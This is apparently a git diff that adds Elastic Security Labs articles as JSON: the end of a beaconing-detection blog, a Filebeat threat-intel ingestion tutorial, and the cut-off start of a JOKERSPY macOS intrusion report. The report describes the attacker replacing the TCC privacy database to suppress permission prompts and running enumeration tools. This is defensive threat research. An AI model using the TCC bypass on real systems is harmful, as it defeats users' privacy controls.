But we were able to detect it due to the low variation in the source bytes of the beacon.\n\nTo test the amount of reduction in search space, we ran the transform over three weeks on an internal cluster that was receiving network event logs from ~ 2k hosts during the testing period. We measured the reduction in search space based on the number of network event log messages, processes, and hosts an analyst or threat hunter would have to sift through before and after running the transform, in order to identify malicious beacons. The numbers are as follows:\n\n\n\nWhile the reduction in search space is obvious, another point to note is the scale of data that the transforms are able to churn through comfortably, which becomes an important aspect to consider, especially in production environments. Additionally, we have also released dashboards (available in the [release package](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1)), which track metrics like prevalence of the beaconing processes, etc. that can help make informed decisions about further filtering of the search space.\n\nWhile the released dashboards and the statistics in the above table are based on cases where the beacon_stats.is_beaconing indicator is true i.e. beacons that satisfy any of the beaconing tests, threat hunters may want to further streamline their search by starting with the most obvious beaconing-like cases and then moving on to the less obvious ones. 
This can be done by filtering and searching by the beacon_stats.beaconing_score indicator instead of beacon_stats.is_beaconing, where a score of 3 indicates a typical beacon (satisfying tests for periodicity as well as low variation in packet bytes), and score of 1 indicates a less obvious beacon (satisfying only one of the three tests).\n\nFor reference, we observed the following on our internal cluster:\n\n\n\n## What's next\n\nWe’d love for you to try out our beaconing identification framework and give us feedback as we work on improving it. If you run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack), [discussion forums](https://discuss.elastic.co/c/security), or even our [open detections repository](https://github.com/elastic/detection-rules). Stay tuned for Part 2 of this blog, where we’ll cover going from identifying beaconing activity to actually detecting on malicious beacons!\n\nTry out our beaconing identification framework with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.\n"
+ },
+ "title": "Identifying beaconing malware using Elastic",
+ "slug": "identifying-beaconing-malware-using-elastic",
+ "date": "2023-03-01",
+ "description": "In this blog, we walk users through identifying beaconing malware in their environment using our beaconing identification framework.",
+ "author": [
+ {
+ "slug": "apoorva-joshi"
+ },
+ {
+ "slug": "thomas-veasey"
+ },
+ {
+ "slug": "craig-chamberlain"
+ }
+ ],
+ "image": "blog-thumbnail-securitymaze.jpg",
+ "category": [
+ {
+ "slug": "machine-learning"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-identifying_beaconing_malware_using_elastic-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md.json
new file mode 100644
index 00000000000..9353b8c5328
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md.json
@@ -0,0 +1,35 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Ingesting threat data with the Threat Intel Filebeat module\"\nslug: \"ingesting-threat-data-with-the-threat-intel-filebeat-module\"\ndate: \"2023-03-01\"\ndescription: \"Tutorial that walks through setting up Filebeat to push threat intelligence feeds into your Elastic Stack.\"\nauthor:\n - slug: andrew-pease\n - slug: marius-iversen\nimage: \"photo-edited-12-t.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\ntags:\n - tutorial\n - filebeat\n - threat intel\n---\n\nThe ability for security teams to integrate threat data into their operations substantially helps their organization identify potentially malicious endpoint and network events using indicators identified by other threat research teams. In this blog, we’ll cover how to ingest threat data with the Threat Intel Filebeat module. In future blog posts, we’ll cover enriching threat data with the Threat ECS fieldset and operationalizing threat data with Elastic Security.\n\n## Elastic Filebeat modules\n\nElastic Filebeat modules simplify the collection, parsing, and visualization of data stored in common log formats. Elastic publishes a variety of [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that are focused on collecting the data you want for use within Elasticsearch. 
These modules provide a standardized and “turnkey” method to ingest specific data sources into the Elastic Stack.\n\nUsing these capabilities, the Threat Intel Filebeat module:\n\n- Consumes threat data from six open source feeds\n- Loads threat data into Elasticsearch\n- Normalizes threat data into the [Threat ECS fieldset](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html)\n- Enables threat analysis through dashboards and visualizations\n\nAnalysts and threat hunters can use this data for raw threat hunting, enrichment, intelligence analysis and production, and detection logic.\n\nThe six supported feeds are:\n\n- [Abuse.ch Malware](https://urlhaus-api.abuse.ch/v1/payloads/recent)\n- [Abuse.ch URL](https://urlhaus.abuse.ch/)\n- [AlienVault Open Threat Exchange (OTX)](https://otx.alienvault.com/)\n- [Anomali Limo](https://www.anomali.com/resources/limo)\n- [Malware Bazaar](https://bazaar.abuse.ch/)\n- [Malware Information Sharing Platform (MISP)](https://www.misp-project.org/)\n\nUsing the Threat Intel Filebeat module, you can choose from several open source threat feeds, store the data in Elasticsearch, and leverage the Kibana Security App to aid in security operations and intelligence analysis.\n\n## Threat Intel Filebeat module\n\nGenerally, the Filebeat Threat Intel module can be started without any configuration to collect logs from Abuse.ch feeds, Anomali Limo, and Malware Bazaar. However, the optional AlienVault OTX and MISP datasets require tokens to authenticate to their feed sources. Thankfully, obtaining a token is a simple process.\n\n### AlienVault OTX\n\nThe team over at Alien Labs® has created the Open Threat Exchange (OTX)® as an open threat intelligence community. This environment provides access to a diverse community of researchers and practitioners. OTX allows anyone in the community to discuss, research, validate, and share threat data. 
Additionally, OTX has an Application Programming Interface (API) endpoint that provides a read-only feed, which is how the Filebeat module consumes the OTX threat data.\n\nTo access the OTX API, you simply need to [create an account](https://otx.alienvault.com/). Once you have an account, you can subscribe to specific OTX community reports and threat data feeds called “Pulses.” These Pulses are retrieved by the Filebeat module and stored in Elasticsearch.\n\nPulses are updated at various cadences, but many are daily or even hourly. The Pulse has a summary of the threat, indicators, and various other enrichments that can help you contextually assess the threat in your environment.\n\nTo subscribe to Pulses, select Browse → Pulses, and then subscribe to any Pulses that you’d like. You can sort by the most recently modified to identify the most active Pulses.\n\n\n\nNow that you’ve subscribed to Pulses of interest, we’ll need to collect your API key.\n\n### Retrieving Your API Key\n\nThe API key is used to securely authenticate to OTX and obtain the indicators from Pulses.\n\nTo retrieve your API key, select your userID → Settings, and then copy your OTX Key.\n\n\n\nNow that we have your OTX Key, let’s set up MISP.\n\n## MISP\n\nThe Malware Information Sharing Platform (MISP) is an open source project for collecting, storing, distributing, and sharing indicators about threats.\n\nWhile MISP is extremely powerful and has a tremendous variety of features, it can be a bit cumbersome to set up. If you are planning on setting up MISP for production, check out the [official documentation](https://github.com/MISP/MISP/tree/2.4/docs) for installing MISP on Kali, RHEL (incl. CentOS and Fedora), or Ubuntu.\n\nIf your organization doesn’t have a MISP instance, you can use one of the many projects that use Docker to get MISP up and running. 
There’s a [great and maintained project](https://github.com/coolacid/docker-misp) by Jason Kendall (@coolacid) that is about as turnkey as you could ask for.\n\n### Standing up CoolAcid’s MISP Docker Containers\n\nAs a caveat, this will cover a default development deployment of MISP. It should not be used in production. Please see the [official MISP documentation](https://github.com/MISP/MISP/tree/2.4/docs) for properly deploying a secure MISP instance.\n\nAs a few prerequisites, you’ll need to have Docker Compose and Git installed:\n\n- **Docker Compose** is used to automate the deployment and configuration of the containers. You can check out [Docker’s documentation](https://docs.docker.com/compose/install/) on getting Compose installed.\n- **Git** is a version-control framework used to coordinate software development among contributors and community members. You can check out the [Git documentation](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git) on getting Git installed.\n\nNext, we need to clone CoolAcid’s repository and fire up the containers.\n\n- git clone: Copies the remote repository to your local machine into a directory called “docker-misp”\n- cd docker-misp: Changes into the “docker-misp” directory\n- docker-compose up -d: Uses the docker-compose file in the “docker-misp” directory to download, build, and start all of the relevant containers in “detached mode” (in the background)\n\n```\nCode Block 1 - Starting MISP Containers\n\n$ git clone https://github.com/coolacid/docker-misp.git\n$ cd docker-misp\n$ docker-compose up -d\n\nPulling misp (coolacid/misp-docker:core-latest)...\ncore-latest: Pulling from coolacid/misp-docker\na54cbf64e415: Pull complete\n84e78d2508ee: Pull complete\n433476aac54e: Pull complete\n780a2dfa04f6: Pull complete\nDigest: sha256:7f380ad0d858bdec2c4e220f612d80431b1a0b0cb591311ade38da53b50a4cc1\nStatus: Downloaded newer image for coolacid/misp-docker:core-latest\nPulling misp-modules 
(coolacid/misp-docker:modules-latest)...\nmodules-latest: Pulling from coolacid/misp-docker\ncdd040608d7b: Pull complete\n4e340668f524: Pull complete\na4501f203bb2: Downloading [=========================================> ] 166.1MB/201.3MB\n2cdaa3afcfca: Download complete\n99a18a4e84d6: Downloading [=============================> ] 130.8MB/218.3MB\n...\n\n```\n\nOnce all of the containers are started, simply browse to [https://localhost](https://localhost:8080) and log in with the default credentials of admin@admin.test and a passphrase of admin. You will immediately be required to change your passphrase.\n\n### Configuring default MISP feeds\n\nOnce you have started the MISP containers and changed your default credentials, hover over Sync Actions and then select List Feeds.\n\n\n\nHighlight the available feeds, select “Enable selected” to enable the default feeds, and then “Fetch and store all feed data.”\n\n\n\nNext, select the “Event Actions” menu item, select “List Events,” and you’ll see data begin to populate. This will take a while.\n\n\n\nWhile the data provided by the MISP threat feeds is being downloaded, let’s get your API key.\n\n### Collecting Your API Key\n\nTo collect your API key, select “Administration” and then “List Users.” You will see your account. Next to your “Authkey” will be an eye icon; select it to show your API key and copy that down.\n\n\n\nNow that we have set up and configured MISP and retrieved our API key, we can configure the actual Filebeat module.\n\n## Installing Filebeat\n\nGetting the Threat Intel module is no different than any other Filebeat module. 
Check out the [Quick Start guide to install Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html) either as a standalone binary or a package for macOS, Windows, or Linux.\n\n## Configuring the Threat Intel Filebeat module\n\nOnce you have Filebeat, we’ll simply enable the module (ensure filebeat is in your $PATH).\n\n```\nCode Block 2 - Enabling the Threat Intel Filebeat Module\n\nfilebeat modules enable threatintel\n```\n\nNext, let’s configure feeds. We’ll do this by modifying the module configuration files. Depending on your OS and installation method, the configuration files will be located in different locations:\n\nWindows\n\n- C:\\Program Files\\Filebeat\\modules.d\\threatintel.yml\n- If installed with [Chocolatey](https://community.chocolatey.org/packages/filebeat)\n- C:\\ProgramData\\chocolatey\\lib\\filebeat\\tools\\modules.d\\threatintel.yml\n\nmacOS\n\n- filebeat/modules.d/threatintel.yml\n- If installed with [Homebrew](https://formulae.brew.sh/formula/filebeat)\n- /usr/local/etc/filebeat/modules.d/threatintel.yml\n\nLinux\n\n- filebeat/modules.d/threatintel.yml\n- If Installed with [APT](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html#_apt) or [YUM / dnf](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html#_yum)\n- /etc/filebeat/modules.d/threatintel.yml\n\nUsing whichever text editor you’re most comfortable with, open threatintel.yml and we’ll add your OTX API key, your MISP API key, and validate Anomali’s credential pair.\n\n### Abuse URL feed configuration\n\nBy default, the Abuse URL feed is enabled and does not need modification. 
The feed includes domain, URI, and URL indicators with additional context for significant dates, tags, submitter, status, etc.\n\n```\nCode Block 3 - Configuring the Abuse URL Feed\n\nabuseurl:\n enabled: true\n\n # Input used for ingesting threat intel data.\n var.input: httpjson\n\n # The URL used for Threat Intel API calls.\n var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/\n\n # The interval to poll the API for updates.\n var.interval: 10m\n```\n\n### Abuse malware feed configuration\n\nBy default, the Abuse malware feed is enabled and does not need modification. The feed includes file hashes and hosts with additional context for significant dates, tags, status, etc.\n\n```\nCode Block 4 - Configuring the Abuse Malware Feed\n\nabusemalware:\n enabled: true\n\n # Input used for ingesting threat intel data.\n var.input: httpjson\n\n # The URL used for Threat Intel API calls.\n var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/\n\n # The interval to poll the API for updates.\n var.interval: 10m\n```\n\n### MISP feed configuration\n\nBy default, the MISP feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, status, submitter, etc.\n\nThe API endpoint that Filebeat will query needs to be configured. If you are running MISP on the same system as Filebeat, you can use var.url: https://localhost/events/restSearch. If you are running MISP elsewhere, you’ll need to enter that hostname or IP address in lieu of localhost.\n\nThe API token is the “Authkey” that you retrieved during the previous MISP setup steps. 
You’ll enter that as the value for var.api_token:\n\nIf you are using a self-signed SSL certificate for MISP, you’ll want to disable the SSL verification mode by uncommenting the var.ssl.verification_mode: none line.\n\n```\nCode Block 5 - Configuring the MISP Feed\n\nmisp:\n enabled: true\n\n # Input used for ingesting threat intel data, defaults to JSON.\n var.input: httpjson\n\n # The URL of the MISP instance, should end with \"/events/restSearch\".\n var.url: https://localhost/events/restSearch\n\n # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI.\n var.api_token: MISP-Authkey\n\n # Configures the type of SSL verification done, if MISP is running on self signed certificates\n # then the certificate would either need to be trusted, or verification_mode set to none.\n var.ssl.verification_mode: none\n\n # Optional filters that can be applied to the API for filtering out results. This should support the majority of\n # fields in a MISP context. For examples please reference the filebeat module documentation.\n #var.filters:\n # - threat_level: [4, 5]\n # - to_ids: true\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request\n # afterwards will filter on any event newer than the last event that was already ingested.\n var.first_interval: 300h\n\n # The interval to poll the API for updates.\n var.interval: 5m\n```\n\n### AlienVault OTX feed configuration\n\nBy default, the AlienVault OTX feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, etc.\n\nThe API token is the “OTX Key” that you retrieved during the AlienVault OTX setup steps. 
You’ll enter that as the value for var.api_token:\n\n```\nCode Block 6 - Configuring the AlienVault OTX Feed\n\notx:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for OTX Threat Intel API calls.\n var.url: https://otx.alienvault.com/api/v1/indicators/export\n\n # The authentication token used to contact the OTX API, which can be found on the OTX UI.\n var.api_token: OTX-Key\n\n # Optional filters that can be applied to retrieve only specific indicators.\n #var.types: \"domain,IPv4,hostname,url,FileHash-SHA256\"\n\n # The timeout of the HTTP client connecting to the OTX API\n #var.http_client_timeout: 120s\n\n # How many hours to look back for each request, should be close to the configured interval.\n # Deduplication of events is handled by the module.\n var.lookback_range: 1h\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours.\n var.first_interval: 400h\n\n # The interval to poll the API for updates\n var.interval: 5m\n```\n\n### Anomali feed configuration\n\nBy default, the Anomali feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, etc.\n\nThe default username and passphrase for the Limo feed are guest:guest, but they are commented out. If you do not have other credential pairs, you can simply uncomment var.username and var.password.\n\nAt the time of this writing, Anomali has 11 collections that they provide as part of their Limo feed. The var.url variable is where the collection is defined. 
To get a list of the collections, you can query the Anomali Limo collections API endpoint (while not required, [jq](https://stedolan.github.io/jq/download/) makes the collections easier to read).\n\n```\nCode Block 7 - Configuring the Anomali Limo Collections\n\n$ curl -L -u guest:guest https://limo.anomali.com/api/v1/taxii2/feeds/collections | jq\n\n{\n \"collections\": [\n {\n \"can_read\": true,\n \"can_write\": false,\n \"description\": \"\",\n \"id\": \"107\",\n \"title\": \"Phish Tank\"\n },\n {\n \"can_read\": true,\n \"can_write\": false,\n \"description\": \"\",\n \"id\": \"135\",\n \"title\": \"Abuse.ch Ransomware IPs\"\n },\n {\n \"can_read\": true,\n \"can_write\": false,\n \"description\": \"\",\n \"id\": \"136\",\n \"title\": \"Abuse.ch Ransomware Domains\"\n },\n...\n```\n\nThe collection ID can be inserted into the Anomali configuration. There are a few ways to do this. You can:\n\n- Manually change the ID\n- Enter all of the IDs and comment out all but the collection you want to target\n- Create a duplicate Anomali configuration section for each collection\n\nThe example below shows the duplicate-sections approach; notice the different collection ID for each section (31, 313, 33) in the var.url: field.\n\n```\nCode Block 8 - Configuring the Anomali Limo Feed\n\n anomali:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for Threat Intel API calls. 
Limo has multiple different possibilities for URLs depending\n # on the type of threat intel source that is needed.\n var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/31/objects\n\n # The username used by Anomali Limo, defaults to guest.\n var.username: guest\n\n # The password used by Anomali Limo, defaults to guest.\n var.password: guest\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours.\n var.first_interval: 400h\n\n # The interval to poll the API for updates\n var.interval: 5m\n\n anomali:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URLs depending\n # on the type of threat intel source that is needed.\n var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/313/objects\n\n # The username used by Anomali Limo, defaults to guest.\n var.username: guest\n\n # The password used by Anomali Limo, defaults to guest.\n var.password: guest\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours.\n var.first_interval: 400h\n\n # The interval to poll the API for updates\n var.interval: 5m\n\n anomali:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URLs depending\n # on the type of threat intel source that is needed.\n var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/33/objects\n...\n\n```\n\nNow that we’ve configured the module to consume threat feed data, let’s send the data into Elasticsearch and visualize it with Kibana.\n\n## Setting up Elasticsearch and Kibana\n\nThe Filebeat Threat Intel module will send the configured threat feed data into Elasticsearch, which can be visualized with Kibana. 
Please see the Elastic documentation for setting up [Elasticsearch](https://www.elastic.co/guide/en/elasticsearch/reference/current/setup.html) and [Kibana](https://www.elastic.co/guide/en/kibana/current/setup.html) production environments. Additionally, if you’re looking for a turnkey approach, you can quickly and securely set up an [Elastic Cloud](https://cloud.elastic.co) account.\n\nFor this non-production example, we’ll be using one of the many projects that use Docker to get Elasticsearch and Kibana up and running quickly.\n\n### Standing up Elasticsearch and Kibana containers\n\nAs a caveat, this will cover a convenient default development deployment of Elasticsearch and Kibana. It should not be used in production. Please see the [Elastic documentation](https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-stack-security.html) for properly deploying a secure instance.\n\nWe’ll simply clone the repository and start the Docker containers.\n\n- git clone: This copies the remote repository to your local machine into a folder called “elastic-container”\n- cd elastic-container: Changes into the “elastic-container” directory\n- sh elastic-container.sh start: This downloads and starts the Elasticsearch and Kibana containers\n\n```\nCode Block 9 - Starting Elastic Containers\n\n$ git clone https://github.com/peasead/elastic-container.git\n$ cd elastic-container\n$ sh elastic-container.sh start\n\n7.12.1: Pulling from elasticsearch/elasticsearch\nddf49b9115d7: Already exists\n4df4d6995ad2: Pull complete\ne180ce5d1430: Pull complete\nb3801a448e4f: Downloading [====> ] 199.3MB/353.1MB\na3100bfb487c: Download complete\n817ce7c869c7: Download complete\n485f138f2280: Download complete\n\n7.12.1: Pulling from kibana/kibana\nddf49b9115d7: Already exists\n588c50b1b6af: Extracting [====================> ] 34.93MB/40.52MB\n9d32826b6fa0: Download complete\n01017880c9d9: Download complete\nefcedd43b7be: Download complete\n0887ad2a14e0: Download 
complete\n625b277c1f7b: Downloading [=====> ] 52.27MB/320.4MB\n68815bc8856d: Download complete\ne9e0d8f8fa8c: Download complete\n```\n\nCheck out the repository [documentation](https://github.com/peasead/elastic-container) for additional usage and configuration options (if needed).\n\nOnce all of the containers are started, simply browse to [http://localhost:5601](http://localhost:5601) and log in with the default username of elastic and passphrase of password.\n\n## Consuming threat data with Filebeat\n\nThere are multiple [output options for Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/configuring-output.html), so use whatever is easiest for you. We’ll use a local Elasticsearch instance in this example. Using a local instance of Elasticsearch and Kibana requires no modification to the filebeat.yml file.\n\nFirst, let’s validate our configuration and our access to Elasticsearch.\n\n- filebeat test config: This will test to ensure your filebeat.yml configuration is correct (if you modified it to fit your environment)\n- filebeat test output: This will test to ensure you can access Elasticsearch\n\n```\nCode Block 10 - Testing Filebeat Configuration and Connection\n\n$ filebeat test config\nConfig OK\n\n$ filebeat test output\nelasticsearch: http://localhost:9200...\n parse url... OK\n connection...\n parse host... OK\n dns lookup... OK\n addresses: ::1, 127.0.0.1\n dial up... OK\n TLS... WARN secure connection disabled\n talk to server... OK\n version: 7.12.0\n```\n\nTo load the dashboards, index pattern, and ingest pipelines, let’s run the setup.\n\n- filebeat setup: This will connect to Kibana and load the index pattern, ingest pipelines, and the saved objects (tags, visualizations, and dashboards)\n\n```\nCode Block 11 - Setting Up Filebeat Index Patterns and saved objects in Kibana\n\n$ filebeat setup\n\nOverwriting ILM policy is disabled. 
Set `setup.ilm.overwrite: true` for enabling.\n\nIndex setup finished.\nLoading dashboards (Kibana must be running and reachable)\nLoaded dashboards\nSetting up ML using setup --machine-learning is going to be removed in 8.0.0. Please use the ML app instead.\nSee more: https://www.elastic.co/guide/en/machine-learning/current/index.html\nLoaded machine learning job configurations\nLoaded Ingest pipelines\n\n```\n\nFinally, let’s [start Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-starting.html) to begin collecting!\n\nNext, browse to Kibana and select the Dashboards app. To make the dashboards easier to find, they all use the “threat intel” tag.\n\n\n\nThere is a dashboard for each feed and an overview dashboard that shows the health of the module.\n\nWe’re also working on improving these dashboards, including adding [drilldown](https://www.elastic.co/guide/en/kibana/current/drilldowns.html) capabilities to each visualization.\n\nAdditionally, as we mentioned in the beginning of this post, this is part one of a three-part series on operationalizing threat data in the Elastic Stack. The next post will cover enhancements to the Threat ECS fieldset and enriching threat data using local endpoint and network observations.\n\nWe’re working on adding additional open source and commercial feeds. If you have feeds that you’d like to see prioritized, please check out the contribution section below.\n\nFinally, we’re looking at opportunities to add context and enrichments to observed events with third-party sources.\n\nSo stay tuned — we’re continuing to lean hard into empowering our customers to defend their environments. Being able to action threat data is a key part of that journey.\n\n## How can you contribute?\n\nThe [Threat Intel Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html) was released with Elastic 7.12, which means that it is still in beta. Testing the feeds, configurations, visualizations, etc. is strongly encouraged. 
We love hearing feedback.\n\nIn addition to the Threat Intel module, there are some other repositories that are related to the collection, processing, and analysis of TI data:\n\n- The Beats [repository](https://github.com/elastic/beats), where you can contribute to, and enhance, threat data feeds\n- The Elastic Common Schema (ECS) [repository](https://github.com/elastic/ecs), where you can be a part of the discussion on shaping how threat data is described in the Elastic Stack\n- The Kibana [repository](https://github.com/elastic/kibana), where analysts interact with the data stored in Elasticsearch\n- The Detection Rules [repository](https://github.com/elastic/detection-rules), where detection logic and rules are created and stored\n\nThe best way to contribute to the community is to explore the functionality, features, and [documentation](https://www.elastic.co/guide/en/beats/filebeat/7.12/filebeat-module-threatintel.html) and let us know through a [GitHub Issue](https://github.com/elastic/beats/issues/new/choose) if there is a problem or something you’d like to see.\n\nIf you’re new to Elastic, experience our latest version of the [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud. Also be sure to take advantage of our [Quick Start training](https://www.elastic.co/training/elastic-security-quick-start) to set yourself up for success.\n"
+ },
+ "title": "Ingesting threat data with the Threat Intel Filebeat module",
+ "slug": "ingesting-threat-data-with-the-threat-intel-filebeat-module",
+ "date": "2023-03-01",
+ "description": "Tutorial that walks through setting up Filebeat to push threat intelligence feeds into your Elastic Stack.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "marius-iversen"
+ }
+ ],
+ "image": "photo-edited-12-t.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "tutorial",
+ "filebeat",
+ "threat intel"
+ ]
+ },
+ "id": "security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inital_research_of_jokerspy-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inital_research_of_jokerspy-md.json
new file mode 100644
index 00000000000..89b54b8b7c1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inital_research_of_jokerspy-md.json
@@ -0,0 +1,47 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Initial research exposing JOKERSPY\"\nslug: \"inital-research-of-jokerspy\"\ndate: \"2023-06-21\"\nsubtitle: \"An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.\"\ndescription: \"Explore JOKERSPY, a recently discovered campaign that targets financial institutions with Python backdoors. This article covers reconnaissance, attack patterns, and methods of identifying JOKERSPY in your network.\"\nauthor:\n - slug: colson-wilhoit\n - slug: salim-bitam\n - slug: seth-goodwin\n - slug: andrew-pease\n - slug: ricardo-ungureanu\nimage: \"photo-edited-04@2x.jpg\"\ncategory:\n - slug: attack-pattern\n - slug: campaigns\ntags:\n - ref9134\n - jokerspy\n - cryptocurrency\n - defi\n - swiftbelt\n---\n\n## Key takeaways\n\n- This is an initial notification of an active intrusion with additional details to follow\n- REF9134 leverages custom and open source tools for reconnaissance and command and control\n- Targets of this activity include a cryptocurrency exchange in Japan\n\n## Preamble\n\nThis research article explores a recently discovered intrusion we’re calling REF9134, which involves using the **sh.py** backdoor to deploy the macOS Swiftbelt enumeration tool. 
**sh.py** and **xcc** have recently been dubbed [JOKERSPY](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/) by Bitdefender.\n\nSpecifically, this research covers:\n\n- How Elastic Security Labs identified reconnaissance from the adversary group\n- The adversary’s steps to evade detection using **xcc** , installing the **sh.py** backdoor, and deploying enumeration tools\n\nA deeper look at this attack may be published at a later date.\n\n## Overview\n\nIn late May of 2023, an adversary with existing access in a prominent Japanese cryptocurrency exchange tripped one of our diagnostic endpoint alerts that detected the execution of a binary ( **xcc** ). **xcc** is not trusted by Apple, and the adversary self-signed it using the native macOS tool **codesign**. While this detection in itself was not necessarily malicious, the industry vertical and additional activity we observed following these initial alerts caught our eye and caused us to pay closer attention.\n\nFollowing the execution of **xcc** , we observed the threat actor attempting to bypass TCC permissions by creating their own TCC database and trying to replace the existing one. On June 1st, a new Python-based tool was seen executing from the same directory as **xcc** and was utilized to execute an open-source macOS post-exploitation enumeration tool known as Swiftbelt.\n\n## Analysis\n\nREF9134 is an intrusion into a large Japan-based cryptocurrency service provider focusing on asset exchange for trading Bitcoin, Ethereum, and other common cryptocurrencies.\n\n### The xcc binary\n\n**xcc** ( **d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8** ) is a self-signed multi-architecture binary written in Swift which is used to evaluate current system permissions. 
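As background for the signature pivot that follows: a VirusTotal content: search matches raw bytes expressed as hexadecimal, so a code-signing identifier must be hex-encoded before searching. A minimal Python sketch of that conversion (illustrative only; the identifier is the one observed on the **xcc** sample in this research):

```python
# Hex-encode a code-signing identifier for a VirusTotal content: search.
# The identifier below is the one observed on the xcc sample.
identifier = "XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4"
hex_query = identifier.encode("ascii").hex()

# Wrap the hex string in the content:{...} search syntax.
print(f"content:{{{hex_query}}}")
```

The same encoding works for any ASCII string you want to pivot on.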
The version observed by Elastic Security Labs is signed as **XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4** , and has a code signature resembling [publicly known](https://objective-see.org/blog/blog_0x73.html) and untrusted payloads.\n\n\n\nTo identify other binaries signed with the same identifier, we converted **XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4** to hexadecimal and searched VirusTotal to identify 3 additional samples ( **content:\\{5850726f74656374436865636b2d35353535343934346637343039366138333662373333313062643535643937643164666635636434\\}** ).\n\nEach contained the same core functionality with structural differences. These discrepancies may indicate that these variants of **xcc** were developed to bypass endpoint capabilities that interfered with execution.\n\nShortly after the creation of **xcc** , researchers observed the threat actor copying **/Users/Shared/tcc.db** over the existing TCC database, **/Library/Application Support/com.apple.TCC/TCC.db**. This may enable the threat actor to avoid TCC prompts visible to system users while simultaneously abusing a directory with broad file write permissions.\n\n#### Xcode artifacts\n\nDuring analysis of this binary, researchers identified two unique paths, **/Users/joker/Developer/Xcode/DerivedData/** and **/Users/joker/Downloads/Spy/XProtectCheck/XProtectCheck/** , which stood out as anomalous. The default path for compiling code with Xcode is **/Users/[username]/Developer/Xcode/DerivedData**.\n\n#### Abusing TCC\n\nPermissions for this kind of system introspection are managed by the native Transparency, Consent, and Control (TCC) feature. 
Researchers determined that **xcc** checks FullDiskAccess and ScreenRecording permissions, as well as checking if the screen is currently locked and if the current process is a trusted accessibility client.\n\n\n\nUpon successfully executing in our [Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) environment, the following results were displayed:\n\n\n\nOnce the custom TCC database was placed in the expected location, the threat actor executed the **xcc** binary.\n\n\n\n#### Initial access\n\nThe **xcc** binary was executed via bash by three separate processes:\n\n- **/Applications/IntelliJ IDEA.app/Contents/MacOS/idea**\n- **/Applications/iTerm.app/Contents/MacOS/iTerm2**\n- **/Applications/Visual Studio Code.app/Contents/MacOS/Electron**\n\nWhile we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or third-party dependency that provided the threat actor access. This aligns with the connection that was made by the researchers at [Bitdefender](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/) who correlated the hardcoded domain found in a version of the **sh.py** backdoor to a Tweet about an infected macOS QR code reader which was found to have a malicious dependency.\n\n#### Deployed cryptographic libraries\n\nOn May 31st, researchers observed three non-native [DyLibs](https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/UsingDynamicLibraries.html) deployed to **/Users/shared/keybag/** called **libcrypto.1.0.0.dylib** , **libncursesw.5.dylib** , and **libssl.1.0.0.dylib**. On macOS, keys 